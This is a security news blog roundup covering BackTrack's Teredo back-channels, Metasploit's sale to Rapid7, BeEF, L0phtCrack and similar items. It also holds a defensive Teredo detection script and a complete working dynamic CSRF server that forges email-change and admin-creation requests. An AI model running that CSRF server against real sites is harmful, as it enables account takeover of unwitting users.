
Here’s an interesting post on using IPv6 to cover your tracks with BackTrack.
Hmm. Alliteration. (ok, no.)
From Network World:
This past week I was working on performing a security assessment and I was using the latest version of BackTrack 4. I noticed that it has Miredo support to help auditors establish a secret IPv6 back-channel to their exploited systems. This shows that the security community is recognizing how IPv6 can be used as a backdoor to owned systems.
Let’s face it, IPv6 deployments haven’t been as numerous as many of us would have hoped. Several years ago we were expecting that at the end of 2009 migration to IPv6 would be in full motion. However, the fact that IPv6 is still fairly obscure to most security administrators means that it can fly under the radar of most organizations. Meanwhile, IPv6 is starting to gain the attention of hackers as a means of creating a covert channel to compromised systems.
For the full article read on.
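The back-channel the article refers to is Teredo (RFC 4380), which Miredo implements: IPv6 packets tunnelled inside UDP, with the client first qualifying against a Teredo server on UDP port 3544 and then living under the 2001::/32 prefix. The check below is an added example, not code from the article or from BackTrack; it runs a constructed set of flow records (the "src dst proto dport bytes" format and the addresses, which use documentation ranges, are made up for the demo) through two simple tests and decodes the server and the client’s public address/port that every Teredo address carries in plain sight.

```python
"""Flag Teredo (Miredo) tunnel activity in flow records.

Added illustration, not from the Network World article or BackTrack.
Teredo addresses are laid out as
    2001:0000 : server-IPv4 : flags : port^0xFFFF : client-IPv4^0xFFFFFFFF
so a single tunnelled address reveals the Teredo server and the NAT's
public address and mapped port.
"""
import ipaddress

TEREDO_PORT = 3544                                  # RFC 4380 service port
TEREDO_PREFIX = ipaddress.ip_network("2001::/32")   # RFC 4380 prefix

# Constructed sample flows in a made-up "src dst proto dport bytes" format.
# 192.0.2.45 plays the Teredo server; 203.0.113.10 is the NAT's public IP.
SAMPLE_FLOWS = """\
10.0.0.5 93.184.216.34 tcp 443 5120
10.0.0.7 192.0.2.45 udp 3544 1460
10.0.0.7 192.0.2.45 udp 3544 9200
10.0.0.9 192.0.2.53 udp 53 80
2001:0:c000:22d:0:63bf:34ff:8ef5 2001:db8::1 tcp 4444 2048
"""


def parse_flow(line):
    """Split one flow line into typed fields."""
    src, dst, proto, dport, nbytes = line.split()
    return {
        "src": ipaddress.ip_address(src),
        "dst": ipaddress.ip_address(dst),
        "proto": proto.lower(),
        "dport": int(dport),
        "bytes": int(nbytes),
    }


def teredo_reason(flow):
    """Return why a flow looks like Teredo, or None if it does not."""
    if flow["proto"] == "udp" and flow["dport"] == TEREDO_PORT:
        return "UDP/3544: client qualifying against a Teredo server"
    for end in ("src", "dst"):
        addr = flow[end]
        if addr.version == 6 and addr in TEREDO_PREFIX:
            return f"{end} {addr} is a Teredo-tunnelled address"
    return None


def find_teredo(text):
    """Run every non-empty flow line through teredo_reason()."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        reason = teredo_reason(parse_flow(line))
        if reason:
            hits.append((line, reason))
    return hits


def decode_teredo(addr):
    """Recover (server IPv4, client port, client IPv4) from a Teredo address."""
    a = ipaddress.IPv6Address(addr)
    if a not in TEREDO_PREFIX:
        return None
    raw = a.packed
    server = str(ipaddress.IPv4Address(raw[4:8]))
    port = int.from_bytes(raw[10:12], "big") ^ 0xFFFF          # obfuscated port
    client = str(ipaddress.IPv4Address(bytes(b ^ 0xFF for b in raw[12:16])))
    return server, port, client


if __name__ == "__main__":
    for line, reason in find_teredo(SAMPLE_FLOWS):
        print(f"{reason:55} <- {line}")
    print(decode_teredo("2001:0:c000:22d:0:63bf:34ff:8ef5"))
```

Port matching only catches the initial exchange with the Teredo server; once a peer or relay is known, the tunnelled traffic goes to whatever UDP port that peer uses, so an egress rule that blocks UDP/3544 and 2001::/32 outright, or an IDS signature that looks for an IPv6 header inside UDP payload, is the stronger control.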

There’s an app for that. Cisco has released an app for security alerts. The real rub is that it appears to be little more than an RSS feed. Albeit, a start.
From The Register:
Cisco has pushed out a new iPhone app that helps IT managers respond to newly-detected security threats by the seat (pocket) of their pants.
The Cisco SIO To Go iPhone application beams in data from the company’s Security Intelligence Operations (SIO) to show a customizable menagerie of security information that could potentially help defend a business network.
But, that’s not all. You can also follow…their Twitter & YouTube feeds.
So, potentially.
Well, nothing like an open source project being bought by a company to cure my writer’s block. That’s right, the company Rapid7 has purchased the Metasploit project. Now, before panic sets in, they have committed to keeping the project open source and community-based. This will no doubt raise some eyebrows, as some will agonize over the corporate spectre hanging over the project. I have had some people privately comment to me that they aren’t overly happy with this, as they don’t feel like doing Rapid7’s work for them pro bono.
A different view is that now the project has the resources to commit to growing and improving the Metasploit project.
I myself have yet to formulate an opinion either way. I would like to say thanks to my tipsters that gave me a heads up earlier this week.
Most importantly, congrats to HD Moore for seeing his love child grow to fruition!
From Metasploit:
I created the Metasploit Project over six years ago as a way to publish security information to those who needed it most, the security professionals in the field. The project has evolved from a personal web site, to a collaborative effort with a small group of friends, and finally to the robust community-driven project that we know today. This progress came at the cost of the evenings, lunch hours, early mornings, and weekends of countless contributors who donate their time for the benefit of the community. The volunteer nature of the project has led to innovation in niche areas and has driven research across a wide range of topics.
Read on for the full post.
…now if I could just get someone to buy Liquidma…er, nevermind.
As of earlier tonight a project a few months in the making has finally been unleashed (pun intended). Thanks to the great guys over at Offensive Security and whoever’s awesome idea it was to team them up with the Metasploit guys, a new resource called Metasploit Unleashed – Mastering the Framework is now online.
For those of you who don’t know, Offensive Security are the people behind the Penetration Testing with BackTrack training. Now they have teamed up with HD Moore and the Metasploit folks and put together the most comprehensive Metasploit training out there.
Best of all, it is free and for a good cause.
“This free information security training is brought to you in a community effort to promote awareness and raise funds for underprivileged children in East Africa. Through a heart-warming effort by several security professionals, we are proud to present the most complete and in-depth open course about the Metasploit Framework.”
To really drive the point home, they decided two all-stars weren’t enough and threw in a third teammate: Johnny Long and Hackers For Charity.
If you enjoy it and find it useful, we ask that you make a donation to the HFC (Hackers For Charity), $4.00 will feed a child for a month, so any contribution is welcome. We hope you enjoy this course as much as we enjoyed making it.
The “full” version of this course includes a PDF guide (it has the same material as the wiki) and a set of Flash videos which walk you through the modules. You may purchase these materials from the Offensive Security Training page. All proceeds from this course go to HFC.
I highly recommend, if you are interested in learning more about the Metasploit Framework, that you float over this way, and even if you’re not interested you should absolutely make a donation to HFC nonetheless.
Get it while it’s hot!
Matt

Hot off the press. Great news today! Wade dropped me a line to let me know that a new version of BeEF was just released! For those of you who might not be familiar with the tool, it’s a browser exploitation framework that’s full of WIN! Oh, and that includes integration with Metasploit.
From Bindshell.net:
BeEF is a browser exploitation framework. This tool will demonstrate the collecting of zombie browsers and browser vulnerabilities in real-time. It provides a command and control interface which facilitates the targeting of individual or groups of zombie browsers.
Enhancements in the latest version include:
* Integration with Metasploit via XMLRPC
* Mozilla extension exploitation support
* New browser functionality detection modules
* Tiered logging for module actions and results
Here are some screenshots:
Just to be clear, that’s BeEF, not Beefcake.

Tags: BeEF, Browser Exploitation, XSS, Wade Alcorn

Weaponizing the Web – Shawn Moyer & Nathan Hamiel
Nathan and Shawn were two of my favorite speakers so far. They are both very smart and awesome guys; buy them beer.
On that note, their talk about weaponizing the web was pretty damn cool to sit in on. For the majority of their talk they reviewed why the social web is such an easily corruptible environment: user-generated content on an increasing number of supremely popular sites is a giant attack surface. User-driven, social, collaborative content, blogs, wikis, and web communities are everywhere you look. Sometimes these things are even being integrated into “old” web media.
Some examples of recent issues that Nathan and Shawn covered were moot being voted to the top of the Time 100 reader poll, post-Michael Jackson celebrity death hoaxes causing “legitimate” news sources to run false stories (RIP Jeff Goldblum), and a New York Times aggregation fail where an article about HTML injection propagated HTML injection.
The emerging socialized web is creating a popular platform for multi-site aggregation, which in the attacker’s eyes equals return on investment: multi-point attack surfaces, APIs, “Digg This!” buttons, etc.
“Malware-like” legitimate functionality is becoming more widely accepted as tolerable, such as silent updates, calling home, and off-site links.
Here is the awesome part: Nathan has released a new tool. He calls it MonkeyFist, and it is a proof-of-concept dynamic CSRF tool. It includes a small Python web server, creates payloads/patterns based on the Referer header, automates per-request “dynamic” CSRF, and constructs hidden POSTs and redirects.
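The mechanism described above (pick a forged request from the Referer, then serve either a hidden auto-submitting POST form or a redirect) is small enough to show end to end. The following is an added example written for this post, not MonkeyFist’s own code: the target sites, paths and form fields are made up, and the page served is what a victim’s browser would load and submit with its own session cookies attached.

```python
"""Dynamic CSRF server: build the forged request from the Referer.

Added illustration, not MonkeyFist's code. All hostnames, paths and
field names below are invented for the demo.
"""
import html
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlencode, urlparse

# Attack patterns keyed by the referring site (constructed sample data).
PATTERNS = {
    "social.example": {
        "method": "POST",
        "action": "https://social.example/settings/email",
        "fields": {"email": "attacker@evil.example", "confirm": "1"},
    },
    "wiki.example": {
        "method": "GET",
        "action": "https://wiki.example/admin/adduser",
        "fields": {"user": "mallory", "role": "admin"},
    },
}
FALLBACK = "https://www.example/"   # decoy for browsers that came from nowhere useful


def select_pattern(referer):
    """Match the Referer host (or a subdomain of it) against PATTERNS."""
    if not referer:
        return None
    host = urlparse(referer).hostname or ""
    for site, pattern in PATTERNS.items():
        if host == site or host.endswith("." + site):
            return pattern
    return None


def build_payload(referer):
    """Return (status, headers, body) tailored to where the victim came from.

    GET patterns become a 302 carrying the parameters; POST patterns become
    a hidden form that the body's onload handler submits immediately.
    """
    pattern = select_pattern(referer)
    if pattern is None:
        return 302, {"Location": FALLBACK}, b""
    if pattern["method"] == "GET":
        target = pattern["action"] + "?" + urlencode(pattern["fields"])
        return 302, {"Location": target}, b""
    inputs = "".join(
        f'<input type="hidden" name="{html.escape(k)}" value="{html.escape(v)}">'
        for k, v in pattern["fields"].items()
    )
    body = (
        '<html><body onload="document.forms[0].submit()">'
        f'<form method="POST" action="{html.escape(pattern["action"])}">'
        f"{inputs}</form></body></html>"
    ).encode()
    return 200, {"Content-Type": "text/html"}, body


class Handler(BaseHTTPRequestHandler):
    """Serve build_payload() for every GET, keyed on the Referer header."""

    def do_GET(self):
        status, headers, body = build_payload(self.headers.get("Referer"))
        self.send_response(status)
        for name, value in headers.items():
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):   # keep the demo quiet
        pass


if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), Handler).serve_forever()
```

Point a browser at the server from a link on one of the “known” sites and the forged request goes out under that site’s cookies; the same page reached from anywhere else just bounces to the decoy. The defence is unchanged from static CSRF: a per-request anti-CSRF token that the forged form cannot know, and cookies that are not sent on cross-site POSTs.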

NIST, helping find the flaws so the bad guys won’t.
From Gov Info Security:
A new report from the National Institute of Standards and Technology (NIST) examines static analyzers, software that identifies weaknesses in other programs that could be triggered accidentally or exploited by hackers.
The report, SP 500-279, will help toolmakers assess their products’ ability to find security defects in other software, according to NIST. Eight tool developers, along with a ninth team of professional human reviewers, participated in the Static Analysis Tool Exposition, or SATE, an exercise by NIST and static analyzer vendors that began in February 2008 to improve the performance of these tools.
Every little bit helps.

OK, this is kind of cool. Voltage has released an interactive map with breach data provided by the good folks at datalossdb.
From Voltage:
- The chances of one or more data breaches that expose 1M+ records in the next year is a virtual certainty: 99.9999%
- We will likely see 1 or 2 data breaches in the next year that expose 10M+ records – equivalent to 5% of US adult population
- We will probably see about 14 data breaches in the next year that expose 1M+ records – 1 in 200 citizens
It allows you to drill down into the respective incidents.

Give it a whirl. Nice way to kill some time.

Well, today is the day. The L0phtCrack site has gone live. At least one reader had an interesting moment when he tried to download the software.
From @andrewsmhay
wow….eSafe certainly doesn’t like the d/l – “Infected with Win32.Infostealer.ga (Non-Removable), Whole File Blocked”
Oops. [UPDATE: It was a hyperactive antivirus program that didn't know any better]
As to the product launch itself:
The code and L0phtCrack name have taken a long strange trip from proof of concept code for a vulnerability in 1997 to a commercial application funding the L0pht’s security research to being sold as a product by the security consulting company @stake and then by the largest security software company in the world, Symantec. Now it is back in the hands of the original authors from the L0pht who are giving it the care and feeding it deserves.
Watch the video.

Budgets are a problem of late for a lot of people. They’re getting slashed, and in many cases it’s just becoming too hard to make ends meet for security programs. One possible solution is GFI’s LANguard. The reason I bring this up is that I’ve gotten word that this Thursday GFI will be announcing a free version of their scanner. The trial version you download gives you the full product for 10 days; after that it switches to a free version that stays full-featured but is limited to 5 IP addresses.
From GFI:
Top Features
* Identify security vulnerabilities and take remedial action
* Detect Virtual Machines
* Automatic remediation of unauthorized applications
* Automatic deployment of network-wide patch and service pack management
* Easily analyze and filter scan results
Sure, it’s not a lot, but five IP addresses for free isn’t too shabby. Look for the official announcement this Thursday.